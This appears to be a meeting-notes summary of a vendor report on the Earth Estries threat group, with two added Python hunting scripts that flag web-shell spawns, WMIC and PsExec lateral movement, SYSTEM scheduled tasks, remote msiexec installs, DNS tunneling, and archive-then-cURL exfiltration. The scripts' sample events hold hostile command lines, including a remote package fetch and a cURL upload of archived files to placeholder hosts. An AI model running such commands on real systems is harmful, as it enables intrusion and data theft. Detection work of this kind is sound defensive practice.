November 8, 2024 at 04:49AM
Earth Estries uses two distinct attack chains, most often gaining a foothold by exploiting vulnerabilities in Microsoft Exchange servers. The first chain relies on CAB-delivered tools such as PsExec and Cobalt Strike for lateral movement; the second uses web shells and backdoors such as Zingdoor for data exfiltration. The group's continuous updating of its tooling confirms that it remains a persistent threat.
### Meeting Takeaways
**Summary of Earth Estries’ Attack Campaigns:**
1. **Two Distinct Attack Chains:**
– **Chain 1:** Utilizes PsExec along with tools like TrillClient, Hemigate, and Crowdoor, delivered via CAB files.
– **Chain 2:** Employs malware such as Zingdoor and SnappyBee, delivered through cURL downloads.
2. **Common Characteristics:**
– Exploitation of vulnerabilities in Microsoft Exchange servers and management tools.
– Use of backdoors for lateral movement and credential theft.
– Persistent updating of tools for prolonged network presence.
**Key Tools and Techniques:**
1. **First Infection Chain:**
– Initial access through QConvergeConsole vulnerabilities, used to install Cobalt Strike and maintain control.
– Credential theft using TrillClient to extract browser data.
– Lateral movement via PsExec and WMIC, with batch files handling tool installation.
2. **Second Infection Chain:**
– Initial access through exploitation of Microsoft Exchange servers via a web shell (ChinaChopper).
– Additional backdoors installed, including Zingdoor and SnappyBee.
– C2 communication often utilizes DNS tunneling or internal proxies to obfuscate traffic.
**Persistence Mechanisms:**
– Scheduled tasks and various loader types (DLL sideloading, msiexec.exe) are used to maintain access.
– Continuous updates and reinstallation of backdoors to avoid detection.
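The host-level behaviours in the two infection chains and the persistence section (a web server process spawning a shell, WMIC/PsExec remote execution, SYSTEM-level scheduled-task creation, msiexec pulling a remote package, and DNS queries with abnormally long labels as a tunneling indicator) each map to a simple hunting rule over process-creation and DNS telemetry. The following is an added example, not Trend Micro's hunting queries or any code from the report; the events are constructed Sysmon-style records built inline, and the hostnames and domains are placeholders rather than indicators from the campaign.

```python
"""Host-level hunting rules for Earth Estries-style behaviours.

Added example, not Trend Micro's hunting queries. Records below are
constructed Sysmon-style events (process creation and DNS query) with
ParentImage/Image/CommandLine/QueryName-like fields; hosts and domains
are placeholders, not indicators from the report.
"""
import re

WEB_SERVER_PROCS = {"w3wp.exe"}          # IIS worker process hosting Exchange OWA/ECP
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed sample telemetry (not real IoCs).
EVENTS = [
    {"host": "EXCH01", "type": "process",
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "whoami"'},
    {"host": "WS07", "type": "process",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic /node:FS02 process call create "cmd.exe /c c:\temp\install.bat"'},
    {"host": "FS02", "type": "process",
     "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\PSEXESVC.exe",
     "cmdline": r"C:\Windows\PSEXESVC.exe"},
    {"host": "FS02", "type": "process",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /create /sc minute /mo 30 /tn Updater /tr c:\temp\ld.exe /ru SYSTEM"},
    {"host": "FS02", "type": "process",
     "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /q /i http://files.example.invalid/pkg.msi"},
    {"host": "FS02", "type": "dns",
     "image": r"C:\Windows\System32\svchost.exe",
     "query": "0a1f3c9e7b2d4a6c8e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d.example.invalid"},
    {"host": "WS07", "type": "process",                      # benign control event
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"host": "WS07", "type": "dns",                          # benign control event
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "query": "www.example.invalid"},
]


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_webshell_spawn(e):
    """Web server worker process starting an interactive shell."""
    return (e["type"] == "process"
            and basename(e["parent"]) in WEB_SERVER_PROCS
            and basename(e["image"]) in SHELLS)


def rule_wmic_remote_exec(e):
    """WMIC pointed at another host and creating a process there."""
    c = e.get("cmdline", "").lower()
    return (e["type"] == "process" and basename(e["image"]) == "wmic.exe"
            and "/node:" in c and "process call create" in c)


def rule_psexec_service(e):
    """PSEXESVC service binary started on the PsExec target side."""
    return e["type"] == "process" and basename(e["image"]) == "psexesvc.exe"


def rule_schtasks_system(e):
    """Scheduled task created from the command line to run as SYSTEM."""
    c = e.get("cmdline", "").lower()
    return (e["type"] == "process" and basename(e["image"]) == "schtasks.exe"
            and "/create" in c and "/ru system" in c)


def rule_msiexec_remote(e):
    """msiexec installing a package fetched over HTTP(S)."""
    return (e["type"] == "process" and basename(e["image"]) == "msiexec.exe"
            and re.search(r"https?://", e.get("cmdline", ""), re.I) is not None)


def rule_long_dns_label(e, max_label=40):
    """DNS query whose longest label exceeds what normal hostnames use."""
    return (e["type"] == "dns"
            and max(len(label) for label in e["query"].split(".")) > max_label)


RULES = {
    "webshell_spawn": rule_webshell_spawn,
    "wmic_remote_exec": rule_wmic_remote_exec,
    "psexec_service": rule_psexec_service,
    "schtasks_system": rule_schtasks_system,
    "msiexec_remote": rule_msiexec_remote,
    "long_dns_label": rule_long_dns_label,
}


def hunt(events):
    """Return (host, rule_name) pairs for every event that matches a rule."""
    return [(e["host"], name)
            for e in events for name, rule in RULES.items() if rule(e)]


if __name__ == "__main__":
    for host, name in hunt(EVENTS):
        print(f"{host}: {name}")
```

Each rule is intentionally narrow so that it can be tuned independently; in production the same predicates would be expressed in the SIEM's query language, and the long-label threshold should be calibrated against the environment's own DNS baseline before alerting on it.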
**Data Collection and Exfiltration:**
– User credentials harvested through TrillClient.
– Sensitive documents are collected with wget and RAR commands, then exfiltrated with cURL to anonymized file-sharing services.
– XOR and other encryption methods are used to protect exfiltrated data.
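The collection-then-exfiltration sequence above (a RAR archive built locally, then pushed out with cURL) is easier to spot as a correlated pair of events on one host than as two isolated process-creation alerts. The following is an added example of that correlation, not Trend Micro's detection logic or code from the report; the events are constructed process-creation records with ISO-8601 timestamps, and the hosts and URLs are placeholders rather than indicators from the campaign.

```python
"""Correlate local archive creation with a later cURL upload from the same host.

Added example, not Trend Micro's detection logic. Events are constructed
process-creation records (timestamp, host, image path, command line);
hosts and URLs are placeholders, not indicators from the report.
"""
import re
from datetime import datetime, timedelta

ARCHIVERS = {"rar.exe", "winrar.exe"}
UPLOADERS = {"curl.exe"}
# cURL options that send a local file or form body to a server
UPLOAD_FLAGS = ("-T", "--upload-file", "-F", "--form", "-d @", "--data-binary @")
WINDOW = timedelta(minutes=30)   # how long after archiving an upload still counts

# Constructed sample telemetry (not real IoCs).
EVENTS = [
    ("2024-11-01T09:00:00", "WS07", r"C:\Program Files\WinRAR\rar.exe",
     r"rar.exe a -r C:\Users\u\backup.rar C:\Users\u\Documents"),
    ("2024-11-01T10:00:00", "FS02", r"C:\ProgramData\rar.exe",
     r"rar.exe a -r C:\ProgramData\d.rar D:\Finance\2024"),
    ("2024-11-01T10:12:00", "FS02", r"C:\Windows\System32\curl.exe",
     r"curl.exe -T C:\ProgramData\d.rar https://share.example.invalid/upload"),
    ("2024-11-01T11:30:00", "WS07", r"C:\Windows\System32\curl.exe",   # download, not upload
     r"curl.exe -s -o C:\temp\x https://updates.example.invalid/x"),
    ("2024-11-01T13:00:00", "WS07", r"C:\Windows\System32\curl.exe",   # upload, but 4 h after archiving
     r"curl.exe -T C:\Users\u\backup.rar https://share.example.invalid/upload"),
]


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_archive_creation(image, cmdline):
    """rar/winrar invoked with the 'a' (add files to archive) command."""
    return basename(image) in ARCHIVERS and re.match(r"\S+\s+a\b", cmdline) is not None


def is_upload(image, cmdline):
    """cURL invoked with an option that sends local data to the server."""
    return basename(image) in UPLOADERS and any(flag in cmdline for flag in UPLOAD_FLAGS)


def upload_target(cmdline):
    """Extract the first URL on the command line, or None."""
    m = re.search(r"https?://\S+", cmdline)
    return m.group(0) if m else None


def correlate(events, window=WINDOW):
    """Return (host, archive_time, upload_time, url) for each upload that is
    preceded within `window` by an archive creation on the same host."""
    parsed = sorted((datetime.fromisoformat(ts), host, image, cmd)
                    for ts, host, image, cmd in events)
    recent_archive = {}   # host -> time of the most recent archive creation
    hits = []
    for ts, host, image, cmd in parsed:
        if is_archive_creation(image, cmd):
            recent_archive[host] = ts
        elif is_upload(image, cmd):
            t0 = recent_archive.get(host)
            if t0 is not None and ts - t0 <= window:
                hits.append((host, t0.isoformat(), ts.isoformat(), upload_target(cmd)))
    return hits


if __name__ == "__main__":
    for host, t_archive, t_upload, url in correlate(EVENTS):
        print(f"{host}: archived at {t_archive}, uploaded at {t_upload} to {url}")
```

The window keeps the rule from pairing an ordinary backup archive with an unrelated upload hours later, while the destination URL gives the responder an immediate pivot into proxy and firewall logs for the same period.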
**Recommendations for Defense:**
1. **Strengthening External Services:**
Focus on securing email servers and web applications, ensuring all known vulnerabilities are patched.
2. **Implementing Robust Credential Management:**
Improve practices to safeguard against credential theft.
3. **Multilayered Defense Strategy:**
Utilize technologies like Trend Vision One™ for comprehensive monitoring and threat detection.
4. **Proactive Threat Intelligence:**
Leverage Trend Micro’s intelligence services to stay informed about emerging threats and actor behavior.
### Additional Notes
– Earth Estries' continuous adaptation of tactics and tools underscores the need for constant vigilance in cyber defense.
– Publishing specific indicators of compromise and hunting queries for the related malware can strengthen detection and response.
**Follow Up:**
– Ensure all departments are briefed on the recommended defensive measures and the importance of maintaining updated threat intelligence protocols.